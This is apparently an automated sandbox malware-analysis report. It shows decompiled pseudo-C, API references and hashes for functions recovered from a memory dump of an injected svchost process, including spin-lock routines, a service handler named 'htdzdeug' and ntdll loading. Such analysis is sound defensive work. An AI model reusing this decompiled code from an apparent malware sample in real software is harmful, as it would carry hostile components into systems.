                                                                                • GetTickCount.KERNEL32 ref: 0012A4E4
                                                                                • Sleep.KERNEL32(00000000,?,0012C2E9,0012C4E0,00000000,localcfg,?,0012C4E0,00133588,00128810), ref: 0012A4F1
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 0012A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 6856055e58dc8dc96e232fed6b081be5a91e66b63da94df9e892181e7032db71
                                                                                • Instruction ID: 963a2bb6db76da67b7a75dbcd2712c58ae26df2d0ceadbaa907925422fa51f9a
                                                                                • Opcode Fuzzy Hash: 6856055e58dc8dc96e232fed6b081be5a91e66b63da94df9e892181e7032db71
                                                                                • Instruction Fuzzy Hash: 1FE0263320022457C6002BA5BD84F6A33C8AF4D7A1F460021FB04D3540C756E89141B3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00124BD1 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00124BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                0x00124bdb
                                                                                0x00124be5
                                                                                0x00124be7
                                                                                0x00124bff
                                                                                0x00124c02
                                                                                0x00124c06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124bee
                                                                                0x00124bf5
                                                                                0x00124bf9
                                                                                0x00000000
                                                                                0x00124bf9
                                                                                0x00000000
                                                                                0x00124bf5
                                                                                0x00124c0c

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00124BDD
                                                                                • GetTickCount.KERNEL32 ref: 00124BEC
                                                                                • Sleep.KERNEL32(00000000,?,?,?,006182F4,001250F2), ref: 00124BF9
                                                                                • InterlockedExchange.KERNEL32(006182E8,00000001), ref: 00124C02
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 32e5862561dbca93baa1f8f500798c62b07d700333f748e3798907f93908ed9a
                                                                                • Instruction ID: 06b350c4913c48e92efad452c656ab527d3d861cce9d786b995fb8f541f56991
                                                                                • Opcode Fuzzy Hash: 32e5862561dbca93baa1f8f500798c62b07d700333f748e3798907f93908ed9a
                                                                                • Instruction Fuzzy Hash: 8EE07D3330122417C71017B97C80F6673DCDB4D3A2F030032F708C2550C752D49041B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 001230FA Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E001230FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                0x0012310b
                                                                                0x00123122
                                                                                0x00123128
                                                                                0x0012312c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00123111
                                                                                0x00123118
                                                                                0x0012311c
                                                                                0x00000000
                                                                                0x0012311c
                                                                                0x00000000
                                                                                0x00123118
                                                                                0x00123131

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00123103
                                                                                • GetTickCount.KERNEL32 ref: 0012310F
                                                                                • Sleep.KERNEL32(00000000), ref: 0012311C
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00123128
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 98cae5698b557ac877357ea5f64a07af7cacfc8392c608e81819099900f5800b
                                                                                • Instruction ID: 2a11c96f5fc2253b4e32394d02783a0d9e5819c84f57c34ce90920f0db4fe928
                                                                                • Opcode Fuzzy Hash: 98cae5698b557ac877357ea5f64a07af7cacfc8392c608e81819099900f5800b
                                                                                • Instruction Fuzzy Hash: 59E02B31300335AFDB042B75BD54B59ABDADF887E1F010031F601D24B0C7548DB08971
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00128CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E00128CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;
				void* _t49;

				_push(_t34);
				_t31 = 0;
				_t49 =  *0x133380 - _t31; // 0x0
				if(_t49 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x133388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x133380; // 0x0
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x133388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x133300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0012A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0012A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

















                                                                                0x00128cf2
                                                                                0x00128cf4
                                                                                0x00128cf6
                                                                                0x00128cfc
                                                                                0x00128dae
                                                                                0x00128db0
                                                                                0x00128db0
                                                                                0x00128d08
                                                                                0x00128d13
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128d1b
                                                                                0x00128d21
                                                                                0x00128d24
                                                                                0x00128d27
                                                                                0x00128d2a
                                                                                0x00128d2f
                                                                                0x00128da1
                                                                                0x00128da1
                                                                                0x00128da8
                                                                                0x00000000
                                                                                0x00128d31
                                                                                0x00128d31
                                                                                0x00128d34
                                                                                0x00128d37
                                                                                0x00128d3c
                                                                                0x00128d50
                                                                                0x00128d6c
                                                                                0x00128d6f
                                                                                0x00128d78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128d7a
                                                                                0x00128d7d
                                                                                0x00128d8b
                                                                                0x00128d8b
                                                                                0x00128d90
                                                                                0x00128d9e
                                                                                0x00128da0
                                                                                0x00000000
                                                                                0x00128d90
                                                                                0x00000000
                                                                                0x00128d7d
                                                                                0x00128d5a
                                                                                0x00128d5f
                                                                                0x00128d62
                                                                                0x00128d67
                                                                                0x00128d67
                                                                                0x00128d67
                                                                                0x00000000
                                                                                0x00128d62
                                                                                0x00128d46
                                                                                0x00000000
                                                                                0x00128d7f
                                                                                0x00128d7f
                                                                                0x00128d83
                                                                                0x00128d84
                                                                                0x00000000
                                                                                0x00128d89

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 536389180-1857712256
                                                                                • Opcode ID: be078fdaa200f04db3313f08781bfd02ecb7eadbf723794c54d8ef97f3b3b451
                                                                                • Instruction ID: 54decdfac89342f7c1e7d3e15b6e983e5cc2984d1384e263d4eb212986a5c511
                                                                                • Opcode Fuzzy Hash: be078fdaa200f04db3313f08781bfd02ecb7eadbf723794c54d8ef97f3b3b451
                                                                                • Instruction Fuzzy Hash: 94212432612229AFCB149FF8EC916AABBB9FF20340B290059E401DB591CF34ED98C714
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012BFCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0012C057
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTickwsprintf
                                                                                • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                • API String ID: 2424974917-1012700906
                                                                                • Opcode ID: 5909c8924a8bfca3740f4f3e4961981c92bd0cac9c53a6cf368d62a837d33120
                                                                                • Instruction ID: 2f63733c9237e9a864f69ad15f0d605cadb13ffa3bdc9253e0b71f37f206b93c
                                                                                • Opcode Fuzzy Hash: 5909c8924a8bfca3740f4f3e4961981c92bd0cac9c53a6cf368d62a837d33120
                                                                                • Instruction Fuzzy Hash: 21118672100100EFDB429BA9CD44E567FA6FB8C318B34819CF6188A166D633D863EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 001226B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 001226C3
                                                                                • inet_ntoa.WS2_32(?), ref: 001226E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbyaddrinet_ntoa
                                                                                • String ID: localcfg
                                                                                • API String ID: 2112563974-1857712256
                                                                                • Opcode ID: 37f7503cdbc43c9876d4e1ea6f69fe064a5e57ec8a5519e51cd64a753841b8ba
                                                                                • Instruction ID: e30c739ef2b4fdd39f7bca472e334a2abf199b3bd1e484978a5094bd56781fc0
                                                                                • Opcode Fuzzy Hash: 37f7503cdbc43c9876d4e1ea6f69fe064a5e57ec8a5519e51cd64a753841b8ba
                                                                                • Instruction Fuzzy Hash: 84F012332482197BEB056FA4FC09E9A3BDCDB09750F144465FD08DA490DB71D9509798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00129961 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00129961() {
				int _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				intOrPtr _t10;
				int _t11;

				_t1 = RegisterServiceCtrlHandlerA("htdzdeug", E00129867);
				 *0x133390 = _t1;
				if(_t1 == 0) {
					L6:
					return _t1;
				}
				 *0x133394 = 0x10;
				 *0x1333a4 = 0;
				_t1 = E00129892(2, 0, 0xbb8);
				_t6 = _t5 + 0xc;
				if(_t1 != 0) {
					_t1 = E00129892(4, 0, 0);
					_t6 = _t6 + 0xc;
					_t10 =  *0x1333b0; // 0x68
					if(_t10 != 0) {
						_t1 = E001298F2(_t4);
					}
				}
				_t11 =  *0x133390; // 0x5cea48
				if(_t11 == 0) {
					goto L6;
				} else {
					return E00129892(1, 0, 0);
				}
			}









                                                                                0x0012996c
                                                                                0x00129974
                                                                                0x0012997b
                                                                                0x001299cf
                                                                                0x001299cf
                                                                                0x001299cf
                                                                                0x00129985
                                                                                0x0012998f
                                                                                0x00129995
                                                                                0x0012999a
                                                                                0x0012999f
                                                                                0x001299a5
                                                                                0x001299aa
                                                                                0x001299ad
                                                                                0x001299b3
                                                                                0x001299b5
                                                                                0x001299b5
                                                                                0x001299b3
                                                                                0x001299ba
                                                                                0x001299c0
                                                                                0x00000000
                                                                                0x001299c2
                                                                                0x00000000
                                                                                0x001299cb

                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(htdzdeug,Function_00009867), ref: 0012996C
                                                                                  • Part of subcall function 00129892: SetServiceStatus.ADVAPI32(00133394), ref: 001298EB
                                                                                  • Part of subcall function 001298F2: Sleep.KERNEL32(000003E8,00000100,001322F8,0012A3C7), ref: 00129909
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CtrlHandlerRegisterSleepStatus
                                                                                • String ID: H\$htdzdeug
                                                                                • API String ID: 1317371667-2215252167
                                                                                • Opcode ID: 538db2b8b218c4ec767adb4c74cead35330d1bd51b5f87dcbdb42ceaee047d98
                                                                                • Instruction ID: dd4e1cd2899f777bc2c61b6c7f8a55937ff3f7cdf47e3cf762e7af0da0d330d5
                                                                                • Opcode Fuzzy Hash: 538db2b8b218c4ec767adb4c74cead35330d1bd51b5f87dcbdb42ceaee047d98
                                                                                • Instruction Fuzzy Hash: ABF082B1980368AEF7106FA47C87B22324CB725348F088029B61949691EBB94DE48266
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012EAE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x1336f4; // 0x77880000
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x1336f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




                                                                                0x0012eae4
                                                                                0x0012eaeb
                                                                                0x0012eb02
                                                                                0x0012eb0d
                                                                                0x0012eaed
                                                                                0x0012eaf2
                                                                                0x0012eaf8
                                                                                0x0012eaff
                                                                                0x00000000
                                                                                0x0012eb01
                                                                                0x0012eb01
                                                                                0x0012eb01
                                                                                0x0012eaff

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,0012EB54,_alldiv,0012F0B7,80000001,00000000,00989680,00000000,?,?,?,0012E342,00000000,76A1F210,80000001,00000000), ref: 0012EAF2
                                                                                • GetProcAddress.KERNEL32(77880000,00000000), ref: 0012EB07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 2574300362-2227199552
                                                                                • Opcode ID: 48845d8acaad67959bb06181b9f6f100763b53da869364df4ebbaee33e8c99d2
                                                                                • Instruction ID: 03167ab667178c329f3cda5dd3d70e194f98b1687e0236a38dce5bb1075b9829
                                                                                • Opcode Fuzzy Hash: 48845d8acaad67959bb06181b9f6f100763b53da869364df4ebbaee33e8c99d2
                                                                                • Instruction Fuzzy Hash: F3D0C974A04302ABCF164F64ED5B9157AE8AB54741B804055B41AC1920E730D9D8DA04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122F22 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00122F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00122D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0012EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0012EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0012EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0012EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0012EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

































                                                                                0x00122f2e
                                                                                0x00122f34
                                                                                0x00122f36
                                                                                0x00122f3d
                                                                                0x00122f42
                                                                                0x00122f4d
                                                                                0x00122f88
                                                                                0x00122f8b
                                                                                0x00122f8e
                                                                                0x00122f93
                                                                                0x00122f93
                                                                                0x00122f96
                                                                                0x00122f98
                                                                                0x00122f9b
                                                                                0x00122f9e
                                                                                0x00122f9e
                                                                                0x00122fa0
                                                                                0x00122fa1
                                                                                0x00122fae
                                                                                0x00122fb3
                                                                                0x00122fb7
                                                                                0x00122fbe
                                                                                0x00122fc1
                                                                                0x00122fc3
                                                                                0x00122fc5
                                                                                0x00122fca
                                                                                0x00122fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122fcd
                                                                                0x00122fdb
                                                                                0x00122fe3
                                                                                0x00122fe8
                                                                                0x001230ad
                                                                                0x00000000
                                                                                0x001230af
                                                                                0x00122ff3
                                                                                0x00122ff4
                                                                                0x00122ff7
                                                                                0x00122ff9
                                                                                0x00122ffd
                                                                                0x00123001
                                                                                0x00123017
                                                                                0x0012301a
                                                                                0x00123021
                                                                                0x00123028
                                                                                0x0012302b
                                                                                0x0012302e
                                                                                0x00123031
                                                                                0x00123034
                                                                                0x00123034
                                                                                0x00123036
                                                                                0x00123037
                                                                                0x00123049
                                                                                0x00123051
                                                                                0x00123054
                                                                                0x00123057
                                                                                0x00123059
                                                                                0x0012305c
                                                                                0x0012305c
                                                                                0x0012305e
                                                                                0x0012305f
                                                                                0x0012306b
                                                                                0x00123070
                                                                                0x00123076
                                                                                0x00123079
                                                                                0x0012307c
                                                                                0x0012307c
                                                                                0x0012307e
                                                                                0x0012307f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00123003
                                                                                0x00123003
                                                                                0x0012300d
                                                                                0x0012300f
                                                                                0x0012300f
                                                                                0x0012300f
                                                                                0x00123012
                                                                                0x00123013
                                                                                0x00000000
                                                                                0x00123083
                                                                                0x0012308f
                                                                                0x00123094
                                                                                0x0012309d
                                                                                0x001230a0
                                                                                0x001230a3
                                                                                0x001230a4
                                                                                0x00000000
                                                                                0x00122ff7
                                                                                0x00122f4f
                                                                                0x00122f4f
                                                                                0x00122f52
                                                                                0x00122f54
                                                                                0x00122f54
                                                                                0x00122f57
                                                                                0x00122f57
                                                                                0x00122f59
                                                                                0x00122f5a
                                                                                0x00122f66
                                                                                0x00122f6e
                                                                                0x00122f7a
                                                                                0x00000000
                                                                                0x00122f7a
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00122D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00122F01,?,001220FF,00132000), ref: 00122D3A
                                                                                  • Part of subcall function 00122D21: LoadLibraryA.KERNEL32(?), ref: 00122D4A
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00122F73
                                                                                • HeapFree.KERNEL32(00000000), ref: 00122F7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: cc7ae17f417526543a1d855fca228929e09304c0d22fd64a718093596472997b
                                                                                • Instruction ID: 54ec6fe02f881bd0eec269ff9392aca47756a16438c95ad8d5fead743ae69fc6
                                                                                • Opcode Fuzzy Hash: cc7ae17f417526543a1d855fca228929e09304c0d22fd64a718093596472997b
                                                                                • Instruction Fuzzy Hash: BE51B271900226AFCF059F64E8849F9BBB5FF15304F114169ECA5D7210E731DA29CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%